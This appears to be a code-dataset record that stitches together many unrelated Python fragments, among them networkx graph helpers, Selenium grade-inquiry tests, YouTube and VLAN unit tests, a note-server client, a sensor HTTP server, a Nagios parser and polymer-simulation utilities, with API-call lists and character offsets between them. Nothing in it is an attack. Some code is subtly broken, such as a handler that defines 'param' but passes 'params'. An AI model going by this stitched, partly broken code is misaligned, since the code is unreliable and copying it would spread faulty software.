def combine_DAGs(succ_G_acyclic_forReal, G):
if not G:
G = succ_G_acyclic_forReal.copy()
else:
for u,v in succ_G_acyclic_forReal.edges():
Gw = succ_G_acyclic_forReal[u][v]["weight"]
if (u,v) not in G.edges():
G.add_edge(u, v, weight=Gw)
else:
G[u][v]["weight"] += Gw
return G
def path_graph( weighted_paths ):
def append_path(G, path, weight):
edges = []
previous = path[0]
for node in path[1:]:
edges.append( (previous, node, {"weight": round(weight, 2)} ) )
previous = node
G.add_edges_from(edges)
G = nx.DiGraph()
for w in sorted(weighted_paths, reverse=True):
for path_w in weighted_paths[w]:
append_path( G, path_w, w )
return G
#2020-01-25
# If paths (u,z,v) and (u,v) exists, leave just (u,z,v)
def minimally_connected(G):
G_minimal = G.copy()
for u, v in G.edges():
# u has already v, then I will work if I have more than one neighbor
if len(G[u]) > 1:
remove_edge = False
# look if I have a longest u,z,v path
for z, attr in G[u].items():
if z != v and z != u:
if nx.has_path(G_minimal, z, v):
remove_edge = True
if remove_edge:
G_minimal.remove_edge( u, v )
return G_minimal
|
[
"math.sqrt",
"sys._getframe",
"networkx.has_path",
"networkx.DiGraph",
"logging.getLogger"
] |
[((104, 123), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (121, 123), False, 'import logging\n'), ((2654, 2666), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (2664, 2666), True, 'import networkx as nx\n'), ((9160, 9172), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (9170, 9172), True, 'import networkx as nx\n'), ((10109, 10121), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (10119, 10121), True, 'import networkx as nx\n'), ((485, 500), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (498, 500), False, 'import sys\n'), ((1675, 1690), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1688, 1690), False, 'import sys\n'), ((3048, 3063), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (3061, 3063), False, 'import sys\n'), ((4845, 4860), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (4858, 4860), False, 'import sys\n'), ((5585, 5600), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (5598, 5600), False, 'import sys\n'), ((7456, 7471), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (7469, 7471), False, 'import sys\n'), ((8197, 8217), 'math.sqrt', 'math.sqrt', (['(Wab + Wba)'], {}), '(Wab + Wba)\n', (8206, 8217), False, 'import math\n'), ((10724, 10752), 'networkx.has_path', 'nx.has_path', (['G_minimal', 'z', 'v'], {}), '(G_minimal, z, v)\n', (10735, 10752), True, 'import networkx as nx\n')]
|
from .base_testcase import BaseTestCase
import os
import unittest
class TestGradeInquiry(BaseTestCase):
def __init__(self, testname):
super().__init__(testname, log_in=False)
def set_grade_inquiries_for_course(self, allowed):
# ensure that grade inquiries are enabled for the course
self.driver.find_element_by_id("nav-sidebar-course-settings").click()
regrade_enabled_checkbox = self.driver.find_element_by_id("regrade-enabled")
if not regrade_enabled_checkbox.is_selected() and allowed:
regrade_enabled_checkbox.click()
elif regrade_enabled_checkbox.is_selected() and not allowed:
regrade_enabled_checkbox.click()
# navigate back to gradeable page
self.driver.find_element_by_id('nav-sidebar-submitty').click()
def set_grade_inquiries_for_gradeable(self, gradeable_id, date=None, allowed=True):
# ensure that grade inquiries are enabled for grades_released_homework gradeable
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//*[@name='edit gradeable configuration_button']").click()
if allowed:
self.driver.find_element_by_id("yes_regrade_allowed").click()
else:
self.driver.find_element_by_id("no_regrade_allowed").click()
# set deadline
if date is not None:
self.driver.find_element_by_xpath("//a[text()='Dates']").click()
self.driver.find_element_by_name("regrade_request_date").send_keys(date)
# navigate back to gradeable page
self.driver.find_element_by_id("nav-sidebar-submitty").click()
# TA GRADING INTERFACE TESTS
# travis should not run this
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_normal_submission_grade_inquiry_panel(self):
gradeable_id = 'grades_released_homework'
grade_inquiry_deadline_date = "9998-01-01 00:00:00"
# login as instructor
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id, grade_inquiry_deadline_date, allowed=True)
# navigate to TA grading interface of student with normal submission
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(@class,'btn-nav-grade')]").click()
self.driver.find_element_by_xpath("//a[contains(text(),'Grading Index')]").click()
self.driver.find_element_by_xpath("//a[contains(@href,'grading/grade?who_id=bauchg')]").click()
# make sure submit button is present
buttons = self.driver.find_elements_by_xpath("//*[contains(@class,'gi-submit')]")
assert len(buttons) == 1
assert buttons[0].text == "Submit Grade Inquiry"
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_no_submission_grade_inquiry_panel(self):
gradeable_id = 'grades_released_homework'
# login as instructor
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id,allowed=True)
# navigate to TA grading interface of student with no submission
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(@class,'btn-nav-grade')]").click()
self.driver.find_element_by_xpath("//a[contains(text(),'Grading Index')]").click()
self.driver.find_element_by_xpath("//a[contains(@href,'grading/grade?who_id=lakinh')]").click()
try:
self.driver.find_element_by_xpath("//div[@id='regrade_info']//*[text()='No Submission']")
except NoSuchElementException:
assert False
assert True
buttons = self.driver.find_elements_by_xpath("//button[contains(@class,'gi-submit')]")
assert len(buttons) == 0
# STUDENT SUBMISSION TESTS
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_normal_submission_student_grade_inquiry_box(self):
gradeable_id = 'grades_released_homework'
grade_inquiry_deadline_date = "9998-01-01 00:00:00"
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id,allowed=True)
self.log_out()
self.log_in(user_id='bauchg')
self.click_class('sample')
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(text(),'VIEW GRADE')]").click()
assert not self.driver.find_element_by_id("regradeBoxSection").is_displayed()
open_grade_inquiry_button = self.driver.find_element_by_xpath("//button[contains(text(),'Open Grade Inquiry')]")
open_grade_inquiry_button.click()
assert not open_grade_inquiry_button.is_displayed()
# make sure submit button is present
buttons = self.driver.find_elements_by_xpath("//button[contains(@class,'gi-submit')]")
assert len(buttons) == 1
assert buttons[0].text == "Submit Grade Inquiry"
|
[
"os.environ.get"
] |
[((1722, 1756), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (1736, 1756), False, 'import os\n'), ((2868, 2902), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (2882, 2902), False, 'import os\n'), ((4046, 4080), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (4060, 4080), False, 'import os\n')]
|
import sys
import os
sys.path.append('../')
import unittest
import requests
import datetime
from youtube_api import YoutubeDataApi
from youtube_api import youtube_api_utils as utils
class TestVideo(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.key = os.environ.get('YT_KEY')
cls.yt = YoutubeDataApi(cls.key)
cls.channel_id = 'UC3XTzVzaHQEd30rQbuvCtTQ'
cls.upload_id = 'UU3XTzVzaHQEd30rQbuvCtTQ'
cls.liked_id = 'LL3XTzVzaHQEd30rQbuvCtTQ'
cls.date = '2018-03-14T20:53:14.000Z'
cls.datetime_date = datetime.datetime(2018, 3, 14, 20, 53, 14)
cls.user_url = 'https://www.youtube.com/user/LastWeekTonight'
cls.channel_url = 'https://www.youtube.com/channel/UC3XTzVzaHQEd30rQbuvCtTQ'
cls.video_id = '481YX6T9Xzs'
cls.video_url = 'https://youtube.com/watch?v=481YX6T9Xzs'
def test_get_upload_playlist_id(self):
'''#Written by <NAME> on 11/30/2018'''
resp = utils.get_upload_playlist_id(self.channel_id)
self.assertEqual(resp, self.upload_id)
def test_get_liked_playlist_id(self):
'''#Written by <NAME> on 11/30/2018'''
resp = utils.get_liked_playlist_id(self.channel_id)
self.assertEqual(resp, self.liked_id)
def test_parse_yt_datetime(self):
''' #Verified by <NAME> on 11/30/2018'''
resp = utils.parse_yt_datetime(self.date)
self.assertEqual(resp, self.datetime_date)
def test_strip_video_id_from_url(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.strip_video_id_from_url(self.video_url)
self.assertEqual(resp, self.video_id)
def test_is_user(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.is_user(self.user_url)
self.assertTrue(resp)
resp = utils.is_user(self.channel_url)
self.assertFalse(resp)
def test_get_url_from_video_id(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.get_url_from_video_id(self.video_id)
self.assertEqual(resp, self.video_url)
if __name__ == '__main__':
unittest.main()
|
[
"sys.path.append",
"unittest.main",
"youtube_api.youtube_api_utils.get_upload_playlist_id",
"youtube_api.youtube_api_utils.get_liked_playlist_id",
"datetime.datetime",
"os.environ.get",
"youtube_api.youtube_api_utils.parse_yt_datetime",
"youtube_api.youtube_api_utils.strip_video_id_from_url",
"youtube_api.YoutubeDataApi",
"youtube_api.youtube_api_utils.is_user",
"youtube_api.youtube_api_utils.get_url_from_video_id"
] |
[((21, 43), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (36, 43), False, 'import sys\n'), ((2211, 2226), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2224, 2226), False, 'import unittest\n'), ((281, 305), 'os.environ.get', 'os.environ.get', (['"""YT_KEY"""'], {}), "('YT_KEY')\n", (295, 305), False, 'import os\n'), ((323, 346), 'youtube_api.YoutubeDataApi', 'YoutubeDataApi', (['cls.key'], {}), '(cls.key)\n', (337, 346), False, 'from youtube_api import YoutubeDataApi\n'), ((574, 616), 'datetime.datetime', 'datetime.datetime', (['(2018)', '(3)', '(14)', '(20)', '(53)', '(14)'], {}), '(2018, 3, 14, 20, 53, 14)\n', (591, 616), False, 'import datetime\n'), ((994, 1039), 'youtube_api.youtube_api_utils.get_upload_playlist_id', 'utils.get_upload_playlist_id', (['self.channel_id'], {}), '(self.channel_id)\n', (1022, 1039), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1209, 1253), 'youtube_api.youtube_api_utils.get_liked_playlist_id', 'utils.get_liked_playlist_id', (['self.channel_id'], {}), '(self.channel_id)\n', (1236, 1253), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1412, 1446), 'youtube_api.youtube_api_utils.parse_yt_datetime', 'utils.parse_yt_datetime', (['self.date'], {}), '(self.date)\n', (1435, 1446), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1619, 1664), 'youtube_api.youtube_api_utils.strip_video_id_from_url', 'utils.strip_video_id_from_url', (['self.video_url'], {}), '(self.video_url)\n', (1648, 1664), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1816, 1844), 'youtube_api.youtube_api_utils.is_user', 'utils.is_user', (['self.user_url'], {}), '(self.user_url)\n', (1829, 1844), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1899, 1930), 'youtube_api.youtube_api_utils.is_user', 'utils.is_user', (['self.channel_url'], {}), '(self.channel_url)\n', (1912, 1930), True, 'from youtube_api import youtube_api_utils as utils\n'), ((2081, 2123), 'youtube_api.youtube_api_utils.get_url_from_video_id', 'utils.get_url_from_video_id', (['self.video_id'], {}), '(self.video_id)\n', (2108, 2123), True, 'from youtube_api import youtube_api_utils as utils\n')]
|
import unittest
import mock
from lxml import etree
from ncclient.operations.retrieve import GetReply
from pyhpecw7.features.vlan import Vlan
from pyhpecw7.features.errors import VlanIDError, LengthOfStringError
from base_feature_test import BaseFeatureCase
class VlanTestCase(BaseFeatureCase):
@mock.patch('pyhpecw7.comware.HPCOM7')
def setUp(self, mock_device):
self.device = mock_device
self.vlan = Vlan(self.device, vlanid='77')
def test_get_vlan_list(self):
expected_get, get_reply = self.xml_get_and_reply('vlan_list')
self.device.get.return_value = get_reply
expected = ['1', '20', '77']
vlan_list = self.vlan.get_vlan_list()
self.assertEqual(vlan_list, expected)
self.assert_get_request(expected_get)
def test_get_config(self):
expected_get, get_reply = self.xml_get_and_reply('vlan')
self.device.get.return_value = get_reply
expected = {'name': 'hello', 'vlanid': '77', 'descr': 'goodbye'}
vlan = self.vlan.get_config()
self.assertEqual(vlan, expected)
self.assert_get_request(expected_get)
def test_build_config(self):
result = self.vlan._build_config(state='present')
expected = self.read_config_xml('vlan')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config(state='present', name='hello')
expected = self.read_config_xml('vlan_name')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config('present', name='hello', descr='goodbye')
expected = self.read_config_xml('vlan_name_descr')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config('absent')
expected = self.read_config_xml('vlan_absent')
self.assert_elements_equal(result, expected)
def test_param_check(self):
with self.assertRaises(LengthOfStringError):
self.vlan.param_check(name=('a' * 255))
with self.assertRaises(LengthOfStringError):
self.vlan.param_check(descr=('b' * 255))
@mock.patch.object(Vlan, '_build_config')
def test_build(self, mock_build_config):
self.vlan.build(name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.build(stage=False, name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.build(stage=True, name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.stage_config.assert_called_with(mock_build_config.return_value, 'edit_config')
@mock.patch.object(Vlan, '_build_config')
def test_remove(self, mock_build_config):
self.vlan.remove()
mock_build_config.assert_called_with(state='absent')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.remove(stage=False)
mock_build_config.assert_called_with(state='absent')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.remove(stage=True)
mock_build_config.assert_called_with(state='absent')
self.device.stage_config.assert_called_with(mock_build_config.return_value, 'edit_config')
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"mock.patch.object",
"pyhpecw7.features.vlan.Vlan",
"mock.patch"
] |
[((303, 340), 'mock.patch', 'mock.patch', (['"""pyhpecw7.comware.HPCOM7"""'], {}), "('pyhpecw7.comware.HPCOM7')\n", (313, 340), False, 'import mock\n'), ((2118, 2158), 'mock.patch.object', 'mock.patch.object', (['Vlan', '"""_build_config"""'], {}), "(Vlan, '_build_config')\n", (2135, 2158), False, 'import mock\n'), ((2886, 2926), 'mock.patch.object', 'mock.patch.object', (['Vlan', '"""_build_config"""'], {}), "(Vlan, '_build_config')\n", (2903, 2926), False, 'import mock\n'), ((3558, 3573), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3571, 3573), False, 'import unittest\n'), ((429, 459), 'pyhpecw7.features.vlan.Vlan', 'Vlan', (['self.device'], {'vlanid': '"""77"""'}), "(self.device, vlanid='77')\n", (433, 459), False, 'from pyhpecw7.features.vlan import Vlan\n')]
|
import datetime
print(datetime.datetime.now().hour)
import time
timestamp = time.strftime('%H')
print(int(timestamp))
|
[
"datetime.datetime.now",
"time.strftime"
] |
[((79, 98), 'time.strftime', 'time.strftime', (['"""%H"""'], {}), "('%H')\n", (92, 98), False, 'import time\n'), ((24, 47), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (45, 47), False, 'import datetime\n')]
|
from concurrent.futures import ThreadPoolExecutor
import requests
import json
class AServerError(Exception):
pass
def raise_for_status(response):
try:
response.raise_for_status()
except Exception as e:
raise AServerError(e)
class AServerConnection:
def __init__(self, server, password):
self.endpoint = '{}/note'.format(server)
self.headers = {
'auth': password,
'User-Agent': 'A-Server Themral Printer 0.1'
}
self.executor = ThreadPoolExecutor()
@staticmethod
def _parse_response(response):
raise_for_status(response)
parsed_body = response.json()
try:
return parsed_body['file']
except KeyError:
raise AServerError(
'Malformed body. Expected key: "file", found: {}'.format(parsed_body)
)
def read(self):
response = requests.get(self.endpoint, headers=self.headers)
return self._parse_response(response)
def futures_read(self):
return self.executor.submit(self.read)
def write(self, note):
response = requests.post(
self.endpoint,
headers=self.headers,
data=json.dumps({'file': note})
)
return self._parse_response(response)
def futures_write(self, note):
return self.executor.submit(self.write, note)
def cleanup(self):
self.executor.shutdown()
|
[
"concurrent.futures.ThreadPoolExecutor",
"requests.get",
"json.dumps"
] |
[((517, 537), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (535, 537), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((915, 964), 'requests.get', 'requests.get', (['self.endpoint'], {'headers': 'self.headers'}), '(self.endpoint, headers=self.headers)\n', (927, 964), False, 'import requests\n'), ((1227, 1253), 'json.dumps', 'json.dumps', (["{'file': note}"], {}), "({'file': note})\n", (1237, 1253), False, 'import json\n')]
|
# Copyright (c) 2017, MD2K Center of Excellence
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import List
from uuid import UUID
from cerebralcortex.kernel.datatypes.datapoint import DataPoint
from cerebralcortex.kernel.datatypes.subtypes import StreamReference, DataDescriptor, ExecutionContext
class Stream:
def __init__(self,
identifier: UUID = None,
owner: UUID = None,
name: UUID = None,
description: str = None,
data_descriptor: List[DataDescriptor] = None,
execution_context: ExecutionContext = None,
annotations: List[StreamReference] = None,
data: List[DataPoint] = None
):
self._identifier = identifier
self._owner = owner
self._name = name
self._description = description
self._data_descriptor = data_descriptor
self._datastream_type = None
self._execution_context = execution_context
self._annotations = annotations
self._data = data
def find_annotation_references(self, identifier: int = None, name: str = None):
result = self._annotations
found = False
if identifier:
found = True
result = [a for a in result if a.stream_identifier == identifier]
if name:
found = True
result = [a for a in result if a.name == name]
if not found:
return []
return result
@property
def annotations(self):
return self._annotations
@annotations.setter
def annotations(self, value):
self._annotations = value
@property
def identifier(self):
return self._identifier
@property
def user(self):
return self._owner
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def data_descriptor(self):
return self._data_descriptor
@data_descriptor.setter
def data_descriptor(self, value):
self._data_descriptor = value
@property
def execution_context(self):
return self._execution_context
@execution_context.setter
def execution_context(self, value):
self._execution_context = value
@property
def datastream_type(self):
return self._datastream_type
@property
def data(self):
return self._data
@data.setter
def data(self, value):
result = []
for dp in value:
result.append(DataPoint(self._identifier, dp.start_time, dp.end_time, dp.sample))
self._data = result
@classmethod
def from_datastream(cls, input_streams: List):
result = cls(user=input_streams[0].user)
# TODO: Something with provenance tracking from datastream list
return result
def __str__(self):
return str(self.identifier) + " - " + str(self.user) + " - " + str(self.data)
def __repr__(self):
result = "Stream(" + ', '.join(map(str, [self.identifier,
self.user,
self.name,
self.description,
self.data_descriptor,
self.datastream_type,
self.execution_context,
self.annotations]))
return result
|
[
"cerebralcortex.kernel.datatypes.datapoint.DataPoint"
] |
[((4028, 4094), 'cerebralcortex.kernel.datatypes.datapoint.DataPoint', 'DataPoint', (['self._identifier', 'dp.start_time', 'dp.end_time', 'dp.sample'], {}), '(self._identifier, dp.start_time, dp.end_time, dp.sample)\n', (4037, 4094), False, 'from cerebralcortex.kernel.datatypes.datapoint import DataPoint\n')]
|
#!/usr/bin/env python2.7
import time
def nagios_from_file(results_file):
"""Returns a nagios-appropriate string and return code obtained by
parsing the desired file on disk. The file on disk should be of format
%s|%s % (timestamp, nagios_string)
This file is created by various nagios checking cron jobs such as
check-rabbitmq-queues and check-rabbitmq-consumers"""
data = open(results_file).read().strip()
pieces = data.split('|')
if not len(pieces) == 4:
state = 'UNKNOWN'
ret = 3
data = "Results file malformed"
else:
timestamp = int(pieces[0])
time_diff = time.time() - timestamp
if time_diff > 60 * 2:
ret = 3
state = 'UNKNOWN'
data = "Results file is stale"
else:
ret = int(pieces[1])
state = pieces[2]
data = pieces[3]
return (ret, "%s: %s" % (state, data))
|
[
"time.time"
] |
[((642, 653), 'time.time', 'time.time', ([], {}), '()\n', (651, 653), False, 'import time\n')]
|
import webapp2
from template import template
class Handler(webapp2.RequestHandler):
def get(self):
param = {}
self.response.write(template("bigboard.html", params))
|
[
"template.template"
] |
[((136, 169), 'template.template', 'template', (['"""bigboard.html"""', 'params'], {}), "('bigboard.html', params)\n", (144, 169), False, 'from template import template\n')]
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from grove.grove_temperature_humidity_sensor_sht3x import GroveTemperatureHumiditySensorSHT3x
import os
import json
class SHT31Handler(BaseHTTPRequestHandler):
sensor = GroveTemperatureHumiditySensorSHT3x()
def do_GET(self):
temperature, humidity = self.sensor.read()
res = dict( temperature = round(temperature, 1)
, humidity = round(humidity, 1)
)
self.send_response(200)
self.send_header("Content-type", "text/json")
self.end_headers()
self.wfile.write(json.dumps(res).encode())
def main():
host = os.getenv("HOST", "0.0.0.0")
port = int(os.getenv("PORT", "80"))
httpd = HTTPServer((host, port), SHT31Handler)
httpd.serve_forever()
if __name__ == '__main__':
main()
|
[
"grove.grove_temperature_humidity_sensor_sht3x.GroveTemperatureHumiditySensorSHT3x",
"http.server.HTTPServer",
"os.getenv",
"json.dumps"
] |
[((269, 306), 'grove.grove_temperature_humidity_sensor_sht3x.GroveTemperatureHumiditySensorSHT3x', 'GroveTemperatureHumiditySensorSHT3x', ([], {}), '()\n', (304, 306), False, 'from grove.grove_temperature_humidity_sensor_sht3x import GroveTemperatureHumiditySensorSHT3x\n'), ((705, 733), 'os.getenv', 'os.getenv', (['"""HOST"""', '"""0.0.0.0"""'], {}), "('HOST', '0.0.0.0')\n", (714, 733), False, 'import os\n'), ((787, 825), 'http.server.HTTPServer', 'HTTPServer', (['(host, port)', 'SHT31Handler'], {}), '((host, port), SHT31Handler)\n', (797, 825), False, 'from http.server import BaseHTTPRequestHandler, HTTPServer\n'), ((749, 772), 'os.getenv', 'os.getenv', (['"""PORT"""', '"""80"""'], {}), "('PORT', '80')\n", (758, 772), False, 'import os\n'), ((654, 669), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (664, 669), False, 'import json\n')]
|
"""
functions.py
In this work, we present PolymerXtal, a software designed to build and analyze molecular-level polymer crystal
structures. PolymerXtal provides a standardized process to generate polymer crystal structure based on monomer,
tacticity, helicity, chiriality and unit cell information and analyze the crystallinity in polymer systems with given
atom trajectories. These features have allowed PolymerXtal to lead further investigations of semi-crystalline polymers
where the birthplace of the important physics in play and promote future research endeavors in the area of crystalline
polymer simulations.
Handles the primary functions
"""
import os, sys, os.path # , math # noqa: E401
# import shutil
import numpy as np
def calc_polymer(mass, nm, polymer_type, p_fra, custom=0):
p = polymer_type.split("-")[0]
wunits = {
"PS": 104.1,
"PE": 28.0516,
"PMMA": 100.117,
"PP": 42.0804,
"POM": 30.0262,
"PTFE": 100.0156,
"PVC": 62.4987,
}
if p == "custom":
wunit = custom
else:
wunit = wunits[p]
m_polymer = (mass * p_fra) / (1 - p_fra)
dp = int(m_polymer / wunit)
nc = dp / nm
print("Degree of polymerization: ", dp, "Chains: ", nc)
return nc
def parameters(periodic, cell, coord, boundaries, radius):
shift = {}
if periodic == "x":
lx = cell["x"][2]
ly = (boundaries["y"][0] + radius) - (boundaries["y"][1] - radius)
lz = (boundaries["z"][0] + radius) - (boundaries["z"][1] - radius)
shift["y"] = boundaries["y"][1] - radius
shift["z"] = boundaries["z"][1] - radius
dx = 1
dy = 0
dz = 0
# cx = -lx
# cy = coord["y"] - shift["y"]
# cz = coord["z"] - shift["z"]
lc = lx
length = [lx, 4 * radius, 4 * radius]
cylinder_p = [-100, 2 * radius, 2 * radius]
elif periodic == "y":
lx = (boundaries["x"][0] + radius) - (boundaries["x"][1] - radius)
ly = cell["y"][2]
lz = (boundaries["z"][0] + radius) - (boundaries["z"][1] - radius)
shift["x"] = boundaries["x"][1] - radius
shift["z"] = boundaries["z"][1] - radius
dx = 0
dy = 1
dz = 0
print(coord, shift)
# cx = coord["x"] - shift["x"]
# cy = -ly
# cz = coord["z"] - shift["z"]
lc = ly
length = [4 * radius, ly, 4 * radius]
cylinder_p = [2 * radius, -100, 2 * radius]
else:
lx = (boundaries["x"][0] + radius) - (boundaries["x"][1] - radius)
ly = (boundaries["y"][0] + radius) - (boundaries["y"][1] - radius)
lz = cell["z"][2]
shift["x"] = boundaries["x"][1] - radius
shift["y"] = boundaries["y"][1] - radius
dx = 0
dy = 0
dz = 1
# cx = coord["x"] - shift["x"]
# cy = coord["y"] - shift["y"]
# cz = -lz
lc = lz
length = [4 * radius, 4 * radius, lz]
cylinder_p = [2 * radius, 2 * radius, -100]
cylinder_d = [dx, dy, dz]
print("Polymod cell: ", length) # , 'Shift cell: ', shift)
return shift, length, cylinder_p, cylinder_d, lc
def run_data4lammps(charge, ffname, cell):
directory = "./data4lammps/"
path_r = os.path.join(directory, "main.py")
path_2 = os.path.join(directory, "doAtomTyping.py")
new_typing_command = "python3.6 {0} {1}".format(path_2, ffname)
data4lammps_command = "python {0} {1} {2} {3} {4} {5} {6} {7}".format(
path_r, 0, cell[0], 0, cell[1], 0, cell[2], charge
)
return new_typing_command, data4lammps_command
def read_dump(ifile, multiframe=0):
Dir = {}
src = open(ifile)
current = ""
timestep = 0
for line in src.readlines():
ln = line.split()
if ln[0] == "ITEM:":
if ln[1] == "TIMESTEP" or ln[1] == "BOX" or ln[1] == "ATOMS":
current = ln[1]
if ln[1] == "BOX":
Dir[timestep][current] = []
if ln[1] == "ATOMS":
Dir[timestep][current] = {}
Dir[timestep][current]["id"] = 0
dump = {}
for i, j in enumerate(ln[2:]):
dump[i] = j
if ln[1:] == "NUMBER OF ATOMS".split():
current = "NUMBER OF ATOMS"
continue
if current == "TIMESTEP":
timestep = eval(ln[0])
if timestep not in Dir:
Dir[timestep] = {}
if current == "NUMBER OF ATOMS":
Dir[timestep][current] = eval(ln[0])
if current == "BOX":
Dir[timestep][current] += [eval(i) for i in ln]
if current == "ATOMS":
cid = Dir[timestep][current]["id"]
Dir[timestep][current][cid] = {}
for i, j in enumerate(
[(eval(k) if k[0].isdigit or k[0] == "-" else k) for k in ln]
):
Dir[timestep][current][cid][dump[i]] = j
Dir[timestep][current]["id"] += 1
return Dir
# def dump2data(datafile, dumpfile, ofile):
# Dir = read_data(datafile)
# if "Velocities" not in Dir:
# Dir["Velocities"] = {}
# src = open(dumpfile)
# box = "x"
# for line in src.readlines():
# ln = line.split()
# if len(ln) == 2 and ln[0] != "ITEM:":
# Dir[box + "lo"] = eval(ln[0])
# Dir[box + "hi"] = eval(ln[1])
# if box == "x":
# box = "y"
# continue
# if box == "y":
# box = "z"
# continue
# continue
# if len(ln) == 8:
# Dir["Atoms"][eval(ln[0])][3] = eval(ln[2])
# Dir["Atoms"][eval(ln[0])][4] = eval(ln[3])
# Dir["Atoms"][eval(ln[0])][5] = eval(ln[4])
# Dir["Atoms"][eval(ln[0])][6] = 0
# Dir["Atoms"][eval(ln[0])][7] = 0
# Dir["Atoms"][eval(ln[0])][8] = 0
# if eval(ln[0]) not in Dir['Velocities']:
# Dir['Velocities'][eval(ln[0])]=[]
# Dir['Velocities'][eval(ln[0])].append(eval(ln[5]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[6]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[7]))
# Dir['Velocities'][eval(ln[0])][0]=eval(ln[5])
# Dir['Velocities'][eval(ln[0])][1]=eval(ln[6])
# Dir['Velocities'][eval(ln[0])][2]=eval(ln[7])
# if len(ln)==11:
# Dir['Atoms'][eval(ln[0])][3]=eval(ln[2])
# Dir['Atoms'][eval(ln[0])][4]=eval(ln[3])
# Dir['Atoms'][eval(ln[0])][5]=eval(ln[4])
# Dir['Atoms'][eval(ln[0])][6]=eval(ln[8])
# Dir['Atoms'][eval(ln[0])][7]=eval(ln[9])
# Dir['Atoms'][eval(ln[0])][8]=eval(ln[10])
# if eval(ln[0]) not in Dir['Velocities']:
# Dir['Velocities'][eval(ln[0])]=[]
# Dir['Velocities'][eval(ln[0])].append(eval(ln[5]))
